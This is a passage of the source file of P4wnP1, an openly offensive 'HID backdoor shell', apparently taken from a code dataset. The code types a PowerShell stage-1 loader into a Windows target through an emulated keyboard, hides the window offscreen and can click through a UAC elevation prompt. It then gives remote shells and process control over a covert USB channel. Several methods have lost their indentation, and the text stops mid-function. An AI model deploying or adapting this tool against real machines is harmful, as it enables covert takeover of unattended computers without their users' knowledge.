source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
P4wnP1.py | #!/usr/bin/python
# This file is part of P4wnP1.
#
# Copyright (c) 2017, Marcus Mengs.
#
# P4wnP1 is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# P4wnP1 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with P4wnP1. If not, see <http://www.gnu.org/licenses/>.
import time
import cmd
import sys
import os
import Queue
import struct
from pydispatch import dispatcher
from LinkLayer import LinkLayer
from TransportLayer import TransportLayer
from threading import Thread, Condition, Event
#from BlockingQueue import BlockingQueue
from DuckEncoder import DuckEncoder
from Config import Config
from StageHelper import StageHelper
from StructHelper import StructHelper
from Channel import *
from Client import *
from FileSystem import *
from mouse.MouseScriptParser import MouseScriptParser
class P4wnP1(cmd.Cmd):
    """
    Maybe this is the class implementing P4wnP1 HID channel user prompt
    ... maybe not, who knows ?!
    """

    # Enables P4wnP1.print_debug() output when True.
    DEBUG = False
    CLIENT_TIMEOUT_MS = 1000 # if this value is reached, the client is regarded as disconnected

    # message types from CLIENT (powershell) to server (python)
    CTRL_MSG_FROM_CLIENT_RESERVED = 0
    CTRL_MSG_FROM_CLIENT_REQ_STAGE2 = 1
    CTRL_MSG_FROM_CLIENT_RCVD_STAGE2 = 2
    CTRL_MSG_FROM_CLIENT_STAGE2_RUNNING = 3
    CTRL_MSG_FROM_CLIENT_RUN_METHOD_RESPONSE = 4 # response from a method ran on client
    #CTRL_MSG_FROM_CLIENT_ADD_CHANNEL = 5
    CTRL_MSG_FROM_CLIENT_RUN_METHOD = 6 # client tasks server to run a method
    CTRL_MSG_FROM_CLIENT_DESTROY_RESPONSE = 7
    CTRL_MSG_FROM_CLIENT_PROCESS_EXITED = 8
    CTRL_MSG_FROM_CLIENT_CHANNEL_SHOULD_CLOSE = 9
    CTRL_MSG_FROM_CLIENT_CHANNEL_CLOSED = 10

    # message types from server (python) to client (powershell)
    CTRL_MSG_FROM_SERVER_STAGE2_RESPONSE = 1000
    #CTRL_MSG_FROM_SERVER_SEND_OS_INFO = 1001
    #CTRL_MSG_FROM_SERVER_SEND_PS_VERSION = 1002
    CTRL_MSG_FROM_SERVER_RUN_METHOD = 1003 # server tasks client to run a method
    #CTRL_MSG_FROM_SERVER_ADD_CHANNEL_RESPONSE = 1004
    CTRL_MSG_FROM_SERVER_RUN_METHOD_RESPONSE = 1005 # response from a method ran on server
    CTRL_MSG_FROM_SERVER_DESTROY = 1006 # tells the client to terminate itself
    CTRL_MSG_FROM_SERVER_CLOSE_CHANNEL = 1007
    def __init__(self, linklayer, transportlayer, config, stage2 = "", duckencoder = None):
        """
        Wire up the server console.

        linklayer:      LinkLayer instance (raw HID transfer, started in start())
        transportlayer: TransportLayer instance (stream based channel multiplexing)
        config:         dict-like global configuration (filesystem paths etc.)
        stage2:         stage 2 payload string handed out on client request
        duckencoder:    DuckEncoder used to type out keystrokes on the target
        """
        # state value to inform sub threads of running state
        self.running = False
        self.stage2=stage2
        self.config = config
        self.client = Client() # object to monitor state of remote client
        self.client.registerCallbackOnConnectChange(self.onClientConnectStateChange)
        #self.control_sysinfo_response = BlockingQueue("CONTROL_SERVER_SYSINFO_RESPONSE")
        # worker threads are created here but only started in start()
        self.server_thread_in = Thread(target = self.__input_handler, name = "P4wnP1 Server Input Loop", args = ( ))
        self.server_thread_out = Thread(target = self.__output_handler, name = "P4wnP1 Server Output Loop", args = ( ))
        self._next_client_method_id = 1 # 32 bit counter, wraps in get_next_method_id()
        self.tl = transportlayer
        self.ll = linklayer
        self.__pending_server_methods = {}
        self.duckencoder = duckencoder
        self.mousescriptparser = MouseScriptParser()
        # register Listener for LinkLayer signals to upper layers (to receive LinkLayer connection events)
        dispatcher.connect(self.signal_handler_transport_layer, sender="TransportLayerUp")
        # commands which are only valid while a client is connected (enforced in precmd)
        self.client_connected_commands = ["ls", "pwd", "cd", "shell", "CreateProc", "interact", "download", "upload", "echotest", "GetClientProcs", "KillClient", "KillProc"]
        self.setPrompt(False, False)
        cmd.Cmd.__init__(self)
        self.intro = '''=================================
P4wnP1 HID backdoor shell
Author: MaMe82
Web: https://github.com/mame82/P4wnP1
State: Experimental (maybe forever ;-))
Enter "help" for help
Enter "FireStage1" to run stage 1 against the current target.
Use "help FireStage1" to get more details.
=================================
'''
    def precmd(self, line):
        """
        cmd.Cmd hook run before every command dispatch: commands listed in
        self.client_connected_commands are suppressed (by returning "") while
        no client is connected; everything else passes through unchanged.
        """
        # NOTE: local name 'cmd' shadows the imported cmd module inside this method
        cmd, args, remain = self.parseline(line)
        if not cmd:
            return line
        if cmd in self.client_connected_commands:
            if not self.client.isConnected():
                print ""
                print "Command '{0}' could only be called with a client connected.".format(cmd)
                print "--------------------------------------------------------------"
                print ""
                print "Use 'SetKeyboardLanguage' to switch to your targtes keyboard"
                print "layout and run 'FireStage1' to connect via HID covert channel."
                print "--------------------------------------------------------------"
                print ""
                return ""
        return line
def setPrompt(self, connectState, reprint = True):
if connectState:
self.prompt = "P4wnP1 shell (client connected) > "
else:
self.prompt = "P4wnP1 shell (client not connected) > "
if reprint:
self.print_reprompt()
def print_reprompt(self, text = ""):
if len(text) > 0:
print text
sys.stdout.write(self.prompt)
sys.stdout.flush()
    @staticmethod
    def print_debug(str):
        """Print a debug line when P4wnP1.DEBUG is set (NOTE: parameter shadows builtin str)."""
        if P4wnP1.DEBUG:
            print "P4wnP1 Server (DEBUG): {}".format(str)
########################
# Internal methods of P4wnP1 server
##########################
def sendControlMessage(self, ctrl_message_type, payload = None):
ctrl_channel = 0
# construct header
ctrl_message = struct.pack("!II", ctrl_channel, ctrl_message_type)
# append payload
if payload:
ctrl_message += payload
self.tl.write_stream(ctrl_message)
    def interactWithClientProcess(self, pid):
        """
        Attach the console to a remote process: forward local stdin lines to
        the process and let the process channels print stdout/stderr. Exits
        when the client disconnects, the process exits, or Ctrl+C is pressed.
        """
        print "Trying to interact with process ID {0} ...".format(pid)
        proc = self.client.getProcess(pid)
        if not proc:
            print "PID {0} not found or process not managed by P4wnP1".format(pid)
            return
        import select
        interacting = True
        proc.setInteract(True) # let the process object inform the channel that stdout and stderr should be used
        while interacting:
            if not self.client.isConnected():
                interacting = False
                print "\nClient disconnected, stop interacting"
                break
            if proc.hasExited:
                print "\nProcess exited... stopping interaction"
                # process was kept only to allow reading its final output; drop it now
                if proc.keepTillInteract:
                    self.client.removeProc(proc.id)
                break
            try:
                #input = getpass.getpass()
                # only read key if data available in stdin(avoid blocking stdout)
                if select.select([sys.stdin], [], [], 0.05)[0]: # 50 ms timeout, to keep CPU load low
                    input = sys.stdin.readline()
                    print input
                    proc.writeStdin(input)
            except KeyboardInterrupt:
                # Ctrl+C detaches from the process but leaves it running
                interacting = False
                proc.setInteract(False)
                print "\nInteraction stopped by keyboard interrupt.\nTo continue interaction use 'interact'."
#def addChannel(self, payload):
#'''
#Client requested new channel, add it...
#'''
#ch_id, ch_type, ch_encoding = struct.unpack("!IBB", payload)
#P4wnP1.print_debug("Server add channel request. Channel id '{0}', type {1}, encoding {2}".format(ch_id, ch_type, ch_encoding))
def onClientConnectStateChange(self, state):
#print "Client connect state: {0}".format(state)
if state:
print "\nTarget connected through HID covert channel\n"
else:
print "\nTarget disconnected"
self.setPrompt(state)
def onClientProcessExitted(self, payload):
# fetch proc id
proc_id = struct.unpack("!I", payload)[0]
proc = self.client.getProcess(proc_id)
if proc:
proc.hasExited = True
self.print_reprompt("Proc with id {0} exited".format(proc_id))
if not proc.keepTillInteract:
self.client.removeProc(proc_id)
def get_next_method_id(self):
next = self._next_client_method_id
# increase next_method id and cap to 0xFFFFFFFF
self._next_client_method_id = (self._next_client_method_id + 1) & 0xFFFFFFFF
return next
def start(self):
# start LinkLayer Threads
print "Starting P4wnP1 server..."
self.ll.start_background()
self.running = True
self.server_thread_in.start()
P4wnP1.print_debug("Server input thread started.")
self.server_thread_out.start()
P4wnP1.print_debug("Server output thread started.")
    def stop(self):
        """Signal both I/O worker threads to leave their loops."""
        self.running = False
    def set_stage2(self, stage2_str):
        """Replace the stage 2 payload handed out on CTRL_MSG_FROM_CLIENT_REQ_STAGE2."""
        self.stage2 = stage2_str
def __output_handler(self):
while self.running:
pending_methods = self.client.getPendingMethods()
for method_id in pending_methods.keys():
try:
method = pending_methods[method_id]
except KeyError:
# the method was removed, because it finished execution meanwhile
P4wnP1.print_debug("Output for the pending method with ID {0} couldn't be processed, method doesn't exist.")
# check if method run has already been requested from client, do it if not
if not method.run_requested:
# request method run
method_request = method.createMethodRequest()
self.sendControlMessage(P4wnP1.CTRL_MSG_FROM_SERVER_RUN_METHOD, method_request)
# mark the method with "run requested"
method.run_requested = True
continue # step forward to next method
P4wnP1.print_debug("Pending method name: '{0}', ID: {1}".format(method.name, method.id))
# process pending output from client channels
###############################################
pendingOut = self.client.getPendingChannelOutput()
if len(pendingOut) > 0:
# push data to transport layer
for stream in pendingOut:
self.tl.write_stream(stream)
#time.sleep(5)
#time.sleep(0.1)
    def __input_handler(self):
        """
        Worker loop (thread): pops inbound streams off the transport layer,
        dispatches control messages (channel 0) and hands all other channel
        data to the Client object. Runs until self.running turns False.
        """
        while self.running:
            # processing input data
            indata = False
            bytes_rcvd = 0
            while self.tl.data_available():
                stream = self.tl.pop_input_stream()
                # deconstruct stream into channel and channel payload (network order endianess)
                ch,payload = struct.unpack("!I{0}s".format(len(stream) - 4), stream)
                if (ch == 0):
                    # control channel, extract control message type
                    msg_type,payload = struct.unpack("!I{0}s".format(len(payload) - 4), payload)
                    if msg_type == P4wnP1.CTRL_MSG_FROM_CLIENT_REQ_STAGE2:
                        P4wnP1.print_debug("indata: Control channel, control message STAGE2 REQUEST")
                        self.client.setStage2("REQUESTED")
                        # we send stage 2
                        response = struct.pack("!II{0}s".format(len(self.stage2)), 0, P4wnP1.CTRL_MSG_FROM_SERVER_STAGE2_RESPONSE, self.stage2) # send back stage 2 as string on channel 0 (control channel) ...
                        self.tl.write_stream(response) # ... directly to transport layer
                    elif msg_type == P4wnP1.CTRL_MSG_FROM_CLIENT_RCVD_STAGE2:
                        self.client.setStage2("RECEIVED")
                    elif msg_type == P4wnP1.CTRL_MSG_FROM_CLIENT_STAGE2_RUNNING:
                        # stage 2 is executing on the target --> client counts as connected
                        self.client.setStage2("RUNNING")
                        self.client.setConnected(True)
                    elif msg_type == P4wnP1.CTRL_MSG_FROM_CLIENT_RUN_METHOD_RESPONSE:
                        # handle method response
                        self.client.deliverMethodResponse(payload)
                    #elif msg_type == P4wnP1.CTRL_MSG_FROM_SERVER_SEND_OS_INFO:
                        #self.client.setOSInfo(payload)
                    #elif msg_type == P4wnP1.CTRL_MSG_FROM_SERVER_SEND_PS_VERSION:
                        #self.client.setPSVersion(payload)
                    #elif msg_type == P4wnP1.CTRL_MSG_FROM_CLIENT_ADD_CHANNEL:
                        #self.addChannel(payload)
                    elif msg_type == P4wnP1.CTRL_MSG_FROM_CLIENT_DESTROY_RESPONSE:
                        self.print_reprompt("Client received terminate!")
                        self.client.setConnected(False)
                    elif msg_type == P4wnP1.CTRL_MSG_FROM_CLIENT_RUN_METHOD:
                        #print "Run method request with following payload received: {0} ".format(repr(payload))
                        pass
                    elif msg_type == P4wnP1.CTRL_MSG_FROM_CLIENT_PROCESS_EXITED:
                        self.onClientProcessExitted(payload)
                    elif msg_type == P4wnP1.CTRL_MSG_FROM_CLIENT_CHANNEL_SHOULD_CLOSE:
                        channel_id = struct.unpack("!I", payload)[0]
                        self.print_reprompt("Client sent channel close request for channel ID {0}, removing channel from server...".format(channel_id))
                        self.client.removeChannel(channel_id)
                        # send back request to close remote channel, too
                        self.sendControlMessage(P4wnP1.CTRL_MSG_FROM_SERVER_CLOSE_CHANNEL, struct.pack("!I", channel_id))
                    elif msg_type == P4wnP1.CTRL_MSG_FROM_CLIENT_CHANNEL_CLOSED:
                        channel_id = struct.unpack("!I", payload)[0]
                        self.print_reprompt("Client confirmed close of remote channel with ID {0}!".format(channel_id))
                    else:
                        P4wnP1.print_debug("indata: Control channel, unknown control message type: {0}, payload: {1} ".format(msg_type, repr(payload)))
                else:
                    # as this is not a control channel, it has to be handled by the client object
                    #P4wnP1.print_debug("indata: for unknown channel channel {0}, payload: {1} ".format(ch, repr(payload)))
                    #P4wnP1.print_debug("indata: for channel channel {0}, payload: {1} ".format(ch, repr(payload)))
                    self.client.sendToInputChannel(ch, payload)
    # loose definition, data argument has to be produced by LinkLayer
    def signal_handler_transport_layer(self, signal, data):
        """
        pydispatch receiver for "TransportLayerUp" signals: translates link
        layer connection events into client link state changes; on timeout the
        link layer is restarted in background.
        """
        P4wnP1.print_debug("TransportLayer signal: {0}".format(signal))
        if signal == "TransportLayerClientConnectedLinkLayer":
            # connection established
            self.client.setLink(True)
        elif signal == "TransportLayerConnectionResetLinkLayer":
            #self.client.setConnected(False)
            self.client.setLink(False)
        elif signal == "TransportLayerConnectionTimeoutLinkLayer":
            # data carries the elapsed time in milliseconds
            if data >= P4wnP1.CLIENT_TIMEOUT_MS:
                self.print_reprompt("\nClient didn't respond for {0} seconds.".format(data/1000))
                self.ll.restart_background()
                self.client.setLink(False)
        elif signal == "TransportLayerWaitingForClient" or signal == "TransportLayerSendStream":
            # ignore these events
            pass
        else:
            P4wnP1.print_debug("Unhandled LinkLayer signal: {0}".format(signal))
    # overwrite cmd.emptyline()
    def emptyline(self):
        """Override cmd.Cmd default: do NOT repeat the last command on empty input."""
        # do nothing
        pass
    #def handler_client_method_response(self, response):
        ## test handler, print response
        #print "Testhandler for client method, result: " + repr(response)
    def killCLient(self):
        """Tell the remote client to terminate itself (name typo kept for callers)."""
        self.sendControlMessage(P4wnP1.CTRL_MSG_FROM_SERVER_DESTROY)
    def stage1_trigger(self, trigger_type=1, trigger_delay_ms=1000, hideTargetWindow = True, bypassUAC = False):
        '''
        Triggers Stage 1 either with pure PowerShell using reflections (trigger_type = 1)
        or with PowerShell invoking a .NET assembly, running stage1 (trigger_type = 2)
        trigger_type 1:
        Is faster, because less keys have to be printed out. As the PowerShell
        isn't capable of reading serial and manufacturer of a USB HID composite device, PID
        and VID have to be prepended in front of the payload.
        trigger_type 2:
        Is slower, because around 6000 chars have to be printed to build the needed assembly.
        There's no need to account on PID and VID, as the code is using the device serial "deadbeefdeadbeef"
        and the manufacturer "MaMe82".
        '''
        gadget_dir = "/sys/kernel/config/usb_gadget/mame82gadget/"
        # DuckyScript stub: open the run dialog and launch powershell.exe
        ps_stub ='''
GUI r
DELAY 500
STRING powershell.exe
ENTER
'''
        ps_stub += "DELAY " + str(trigger_delay_ms) + "\n"
        if bypassUAC:
            # confirm UAC dialog with "SHIFT+TAB, ENTER" to be language independent (no "ALT+Y")
            ps_stub += '''
STRING start powershell -verb runas;exit
ENTER
DELAY 500
SHIFT TAB
DELAY 100
ENTER
'''
            # use trigger delay once more
            ps_stub += "DELAY " + str(trigger_delay_ms) + "\n"
        ps_script = ""
        if hideTargetWindow:
            # move window offscreen + hide it + post request to owning window
            ps_script += StageHelper.out_PS_SetWindowPos(x=-100, y=-100, cx=80, cy=80, flags=0x4000+0x80) + "\n"
            #ps_script += StageHelper.out_PS_SetWindowPos(x=100, y=100, cx=80, cy=80, flags=0x4) + "\n"
        if trigger_type == 1:
            # read PID and VID of the USB gadget from configfs
            pid=""
            with open(gadget_dir+"idProduct","r") as f:
                pid=f.read()
            pid=(pid[2:6]).upper()
            vid=""
            with open(gadget_dir+"idVendor","r") as f:
                vid=f.read()
            vid=(vid[2:6]).upper()
            # stage 1 needs VID/PID prepended to locate the HID device on the target
            ps_script += "$USB_VID='{0}';$USB_PID='{1}';".format(vid, pid)
            with open(self.config["PATH_STAGE1_PS"],"rb") as f:
                ps_script += StageHelper.out_PS_IEX_Invoker(f.read())
        elif trigger_type == 2:
            # slower .NET dll based stage 1
            ps_script += StageHelper.out_PS_Stage1_invoker(self.config["PATH_STAGE1_DOTNET"])
        self.duckencoder.outhidDuckyScript(ps_stub) # print DuckyScript stub
        self.duckencoder.outhidStringDirect(ps_script + ";exit\n") # print stage1 PowerShell script
    ###################
    # caller methods and handlers for remote client methods
    #####################

    # CALLERS
    def client_call_echo(self, echostring):
        """Remote echo round trip; blocks until the client delivered its answer."""
        self.client.callMethod("core_echo", echostring, self.handler_client_echotest, waitForResult = True)
    def client_call_get_proc_list(self, waitForResult = False):
        """Ask the client for its managed process list; printed by the handler."""
        self.client.callMethod("core_get_client_proc_list", "", self.handler_client_get_proc_list, waitForResult = waitForResult)
    def client_call_create_shell_proc(self, shell="cmd.exe"):
        """
        Create a remote shell process with channels bound and, on success,
        immediately attach the console to it.
        """
        args=""
        method_args = struct.pack("!B{0}sx{1}sx".format(len(shell), len(args)), 1, shell, args) # create null terminated strings from process name and args
        # we could use the create proc handler
        no_error, proc = self.client.callMethod("core_create_proc", method_args, self.handler_client_create_shell_proc, waitForResult = True, deliverResult = True)
        if no_error:
            if proc:
                self.interactWithClientProcess(proc.id)
        else:
            # on error, 'proc' carries the error description instead of a process
            self.print_reprompt("Trying to create the process resulted in error: {0}".format(proc))
def client_call_create_proc(self, filename, args, use_channels = True, waitForResult = False):
# build arguments: [String] ProcFilename + [String] ProcArgs
use_channels_byte = 0
if use_channels:
use_channels_byte = 1
method_args = struct.pack("!B{0}sx{1}sx".format(len(filename), len(args)), use_channels_byte, filename, args) # create null terminated strings from process name and args
self.client.callMethod("core_create_proc", method_args, self.handler_client_create_proc, waitForResult = waitForResult)
    def client_call_kill_proc(self, proc_id):
        """Ask the client to kill the process with the given id (uint32, network order)."""
        method_args = struct.pack("!I", proc_id)
        self.client.callMethod("core_kill_proc", method_args, self.handler_client_kill_proc, waitForResult = False)
    def client_call_inform_channel_added(self, channel):
        """Tell the client that the server registered the given channel id."""
        self.client.callMethod("core_inform_channel_added", struct.pack("!I", channel.id), self.handler_client_inform_channel_added, waitForResult = False)
    def client_call_destroy_channel(self, channel):
        """Ask the client to destroy the given channel; handler removes it locally."""
        self.client.callMethod("core_destroy_channel", struct.pack("!I", channel.id), self.handler_client_destroy_channel, waitForResult = False)
    # HANDLER
    def handler_pass_through_result(self, response):
        """Identity handler: hand the raw response back to the caller unmodified."""
        return response
    def handler_client_echotest(self, response):
        """Print the echoed string received from the client."""
        print response
    def handler_client_get_proc_list(self, response):
        """Print the client's process list, normalizing Windows line endings."""
        print response.replace("\r\n", "\n")
    def handler_client_create_shell_proc(self, response):
        """Shell processes are plain processes; reuse the create-proc handler."""
        return self.handler_client_create_proc(response)
    def handler_client_kill_proc(self, response):
        """No-op handler; channel cleanup happens via the channel close messages."""
        #pid = struct.unpack("!I", response)[0]
        #proc = self.client.getProcess(pid)
        #if proc:
            #self.client.removeChannel(proc.ch_stdin.id)
            #self.client.removeChannel(proc.ch_stderr.id)
            #self.client.removeChannel(proc.ch_stdout.id)
        pass
    def handler_client_create_proc(self, response):
        """
        Handler for 'core_create_proc': unpack the new process description
        (pid, channel flag, stdin/stdout/stderr channel ids), mirror the
        channels and the process in local client state and confirm each
        channel back to the client. Returns the ClientProcess when channels
        are in use, None otherwise.
        """
        proc_id, uses_channels, ch_stdin, ch_stdout, ch_stderr = struct.unpack("!IBIII", response)
        uses_channels = bool(uses_channels) # convert bool
        if uses_channels:
            P4wnP1.print_debug("Process created channels, PID: {0}, CH_STDIN: {1}, CH_STDOUT: {2}, CH_STDERR: {3}".format(proc_id, ch_stdin, ch_stdout, ch_stderr))
            # we keep track of the process channels in client state, thus we create and add channels
            # create STDIN channel
            ch_stdin = Channel(ch_stdin, Channel.TYPE_OUT, Channel.ENCODING_UTF8) # from our perspective, this is an OUT channel (IN on client)
            # create STDOUT channel
            ch_stdout = Channel(ch_stdout, Channel.TYPE_IN, Channel.ENCODING_UTF8) # from our perspective, this is an IN channel (OUT on client)
            # create STDERR channel
            ch_stderr = Channel(ch_stderr, Channel.TYPE_IN, Channel.ENCODING_UTF8) # from our perspective, this is an IN channel (OUT on client)
            self.client.addChannel(ch_stdin)
            self.client.addChannel(ch_stdout)
            self.client.addChannel(ch_stderr)
            proc = ClientProcess(proc_id, ch_stdin, ch_stdout, ch_stderr)
            self.client.addProc(proc)
            #self.client.callMethod("core_inform_channel_added", struct.pack("!I", ch_stdin.id), self.handler_core_inform_channel_added, waitForResult = False)
            #self.client.callMethod("core_inform_channel_added", struct.pack("!I", ch_stdout.id), self.handler_core_inform_channel_added, waitForResult = False)
            #self.client.callMethod("core_inform_channel_added", struct.pack("!I", ch_stderr.id), self.handler_core_inform_channel_added, waitForResult = False)
            self.client_call_inform_channel_added(ch_stdin)
            self.client_call_inform_channel_added(ch_stderr)
            self.client_call_inform_channel_added(ch_stdout)
            print "Process with ID {0} created".format(proc_id)
            return proc
        else:
            # no channels bound --> nothing to track beyond the notification
            print "Process created without channels, PID: {0}".format(proc_id)
    def handler_client_inform_channel_added(self, response):
        """Debug-log the client's acknowledgement of a newly added channel."""
        P4wnP1.print_debug("Channel added inform " + repr(response))
def handler_client_destroy_channel(self, response):
channel_id = struct.unpack("!I", response)[0]
self.client.removeChannel(channel_id)
###################
# interface methods callable from P4wnP1 console
#####################
def do_KillProc(self, line):
'''
Try to kill the given remote process
'''
try:
proc_id = int(line)
self.client_call_kill_proc(proc_id)
except ValueError:
print "{0} is not a process id".format(line)
def do_KillClient(self, line):
'''
Try to kill the remote client
'''
if not self.client.isConnected():
print "This doesn't make sense, there's no client connected"
return
self.killCLient()
def do_CreateProc(self, line):
'''
This remote Powershell method calls "core_create_proc" in order to create a remote process
The response is handled by "handler_client_core_create_proc()"
'''
if not self.client.isConnected():
print "Not possible, client not connected"
return
if " " in line:
proc_name, proc_args = line.split(" ",1)
else:
proc_name = line
proc_args = ""
self.client_call_create_proc(proc_name, proc_args, use_channels = True, waitForResult = False)
def do_GetClientProcs(self, line):
'''
Print a list of processes managed by the remote client
'''
if not self.client.isConnected():
print "Not possible, client not connected"
return
self.client_call_get_proc_list(waitForResult = True)
def do_shell(self, line):
if not self.client.isConnected():
print "Not possible... Run 'FireStage1' first, to get the target connected"
return
if "powershell" in line.lower():
self.client_call_create_shell_proc("powershell.exe")
else:
self.client_call_create_shell_proc()
    #def do_run_method(self, line):
        #if " " in line:
            #method_name, method_args = line.split(" ",1)
        #else:
            #method_name = line
            #method_args = ""
        #self.client.callMethod(method_name, method_args, self.handler_client_method_response)
    def do_SendKeys(self, line):
        '''
        Prints out everything on target through HID keyboard. Be sure
        to set the correct keyboard language for your target (use
        'GetKeyboardLanguage' and 'SetKeyboardLanguage' commands.).
        '''
        self.duckencoder.outhidStringDirect(line)
    def do_FireStage1(self, line):
        '''
        usage: FireStage1 <trigger_type> <trigger_delay in milliseconds> [nohide] [uac]
        Fires stage 1 via HID keyboard against a PowerShell process
        on a Windows client.
        The code downloads stage 2 and after successful execution
        commands like "shell" could be used, to get a remote shell
        (communicating through HID covert channel only).
        THE KEYBOARD LANGUAGE HAS TO BE SET ACCORDING TO THE TARGETS
        KEYBOARD LAYOUT, TO MAKE THIS WORK (use 'GetKeyboardLanguage'
        and 'SetKeyboardLanguage' commands.)
        trigger_type = 1 (default):
        Is faster, because less keys have to be printed out. As the
        PowerShell script isn't capable of reading serial and
        manufacturer of a USB HID composite device, PID and VID have
        to be prepended in front of the payload. This leaves a larger
        footprint.
        trigger_type = 2:
        Is slower, because around 6000 chars have to be printed to
        build the needed assembly. There's no need to account on PID
        and VID, as the code is using the device serial "deadbeef
        deadbeef" and the manufacturer "MaMe82". These are hardcoded
        in the assembly, and leave a smaller footprint (not ad-hoc
        readable, if powershell script content is logged).
        trigger_delay (default 1000):
        The payload is started by running powershell.exe and directly
        entering the script with HID keyboard.
        This part is critical, as if keystrokes get lost the initial
        stage won't execute. This could be caused by user interaction
        during stage 1 typeout or due to PowerShell.exe starting too
        slow and thus getting ready for keyboard input too late.
        The latter case could be handled by increasing the trigger delay,
        to give the target host more time between start of powershell
        and start of typing out stage1.
        The value defaults to 1000 ms if omitted.
        nohide
        If "nohide" is added, the stub hiding the powershell window on
        the target is omitted
        uac
        If "uac" is added P4wnP1 tries to run an elevated PowerShell
        session homing the payload.
        Caution: The target user has to be member of the "Local
        Administrators" group, otherwise this would fail.
        The option is disabled by default.
        '''
        arg_error="Wrong arguments given"
        trigger_type = 1
        trigger_delay_ms = 1000
        # NOTE(review): "nohide"/"uac" flags also land in args, so int() below
        # raises and arg_error is printed while the defaults are still used
        args = line.split(" ")
        if len(args) == 1 and len(line) > 0:
            try:
                trigger_type = int(args[0])
            except ValueError:
                print arg_error
        elif len(args) == 2:
            try:
                trigger_type = int(args[0])
                trigger_delay_ms = int(args[1])
            except ValueError:
                print arg_error
        hideTargetWindow = True
        if "nohide" in line.lower():
            hideTargetWindow = False
        bypassUAC = False
        if "uac" in line.lower():
            bypassUAC = True
        print "Starting to type out stage1 to the target..."
        self.stage1_trigger(trigger_type=trigger_type, trigger_delay_ms=trigger_delay_ms, hideTargetWindow = hideTargetWindow, bypassUAC=bypassUAC)
        print "...done. If the client doesn't connect back, check the target"
        print "keyboard layout with 'SetKeyboardLanguage'"
def do_SetKeyboardLanguage(self, line):
'''
Sets the language for target keyboard interaction.
Possible values:
be, br, ca, ch, de, dk, es, fi, fr, gb, hr, it,
no, pt, ru, si, sv, tr, us
'''
singleprint = False
if len(line) > 0:
self.duckencoder.setLanguage(line.lower())
singleprint = True
current_language = self.duckencoder.getLanguage()
# fetch possible languages
hasChosen = False
available_langs = [lang.replace(".properties", "") for lang in FileSystem.ls(self.config["PATH_LANGUAGES"]) if lang != "keyboard.properties"]
per_line = 8
langNum = 0
singleprint = False
if len(line) > 0 and line.lower() in available_langs:
self.duckencoder.setLanguage(line.lower())
singleprint = True
while not hasChosen:
# print available languages
print "Choose language by number or name:"
print "================================\n"
index = 0
for i in range(0, len(available_langs), per_line):
line = ""
for j in range(per_line):
index = i + j
if index >= len(available_langs):
break
if available_langs[index] == current_language:
line += "[{0}:{1}]\t".format(index, available_langs[index])
else:
line += "{0}:{1} \t".format(index, available_langs[index])
print line
if singleprint:
break
given = raw_input("Your selection or 'x' to abort: ")
if given == "x":
print "abort ..."
return
# try to choose by name
if given in available_langs:
langNum = available_langs.index(given)
hasChosen = True
break
# try to choose by number
try:
langNum = int(given)
if langNum >= 0 and langNum < len(available_langs):
hasChosen = True
break
else:
print "Invalid input..."
continue
except ValueError:
print "Invalid input..."
continue
if hasChosen:
print self.duckencoder.setLanguage(available_langs[langNum])
else:
return
    def do_GetKeyboardLanguage(self, line):
        '''
        Shows which language is set for HID keyboard.
        '''
        print self.duckencoder.getLanguage()
def do_interact(self, line):
if not self.client.isConnected():
print "Not possible, client not connected"
return
pid = line.split(" ")[0]
if pid == "":
print "No process ID given, choose from:"
procs = self.client.getProcsWithChannel()
for p in procs:
if p.hasExited:
print "{0} (exited, interact to see final output)".format(p.id)
else:
print "{0}".format(p.id)
return
try:
pid = int(pid.strip())
except ValueError:
print "No valid process id: {0}".format(pid)
return
self.interactWithClientProcess(pid)
def do_exit(self, line):
print "Exitting..."
# self.ll.stop() # should happen in global finally statement
sys.exit()
    def do_state(self, line):
        """Print the current client state as tracked by the Client object."""
        self.client.print_state()
    def do_echotest(self, line):
        '''
        If the client is connected, command arguments given should be reflected back.
        Communications happen through a pure HID covert channel.
        '''
        self.client_call_echo(line)
def do_GetClientTimeout(self, line):
print "The client is considered disconnected, if no HID communication occures for"
print "\t{0} ms".format(P4wnP1.CLIENT_TIMEOUT_MS)
print
print "If you encounter disconnection issues (client is processing data to slow) increase"
print "this delay with `SetClientTimeout`"
def do_SetClientTimeout(self, line):
try:
val = int(line)
if val < 10 or val > 10000:
print "Timeout has to be chosenbetween 10ms and 10000ms"
return
P4wnP1.CLIENT_TIMEOUT_MS = val
except ValueError:
print "You have to provide a new timeout value in milliseconds"
    def do_SendDuckyScript(self, line):
        """
        Type out a DuckyScript from PATH_DUCKYSCRIPT on the target. If no (or
        an unknown) script name is given, present an interactive chooser.
        """
        scriptpath = self.config["PATH_DUCKYSCRIPT"] + "/" + line
        if not FileSystem.fileExists(scriptpath):
            print "No script given or given script not found"
            hasChosen = False
            scriptNum = 0
            available_scripts = FileSystem.ls(self.config["PATH_DUCKYSCRIPT"])
            while not hasChosen:
                # print out available scripts
                print "Choose script by number or name:"
                print "================================\n"
                for i in range(len(available_scripts)):
                    print "{0}:\t{1}".format(i, available_scripts[i])
                given = raw_input("Your selection or 'x' to abort: ")
                if given == "x":
                    print "abort ..."
                    return
                # try to choose by name
                if given in available_scripts:
                    scriptNum = available_scripts.index(given)
                    hasChosen = True
                    break
                # try to choose by number
                try:
                    scriptNum = int(given)
                    if scriptNum >= 0 and scriptNum < len(available_scripts):
                        hasChosen = True
                        break
                    else:
                        print "Invalid input..."
                        continue
                except ValueError:
                    print "Invalid input..."
                    continue
            if hasChosen:
                scriptpath = self.config["PATH_DUCKYSCRIPT"] + "/" + available_scripts[scriptNum]
            else:
                return
        # read in script
        script = ""
        with open(scriptpath, "r") as f:
            script = f.read()
        # execute script
        self.duckencoder.outhidDuckyScript(script)
    def do_SendMouseScript(self, line):
        """
        Execute a MouseScript from PATH_MOUSESCRIPT on the target. If no (or
        an unknown) script name is given, present an interactive chooser.
        Execution can be aborted with Ctrl+C.
        """
        scriptpath = self.config["PATH_MOUSESCRIPT"] + "/" + line
        if not FileSystem.fileExists(scriptpath):
            print "No script given or given script not found"
            hasChosen = False
            scriptNum = 0
            available_scripts = FileSystem.ls(self.config["PATH_MOUSESCRIPT"])
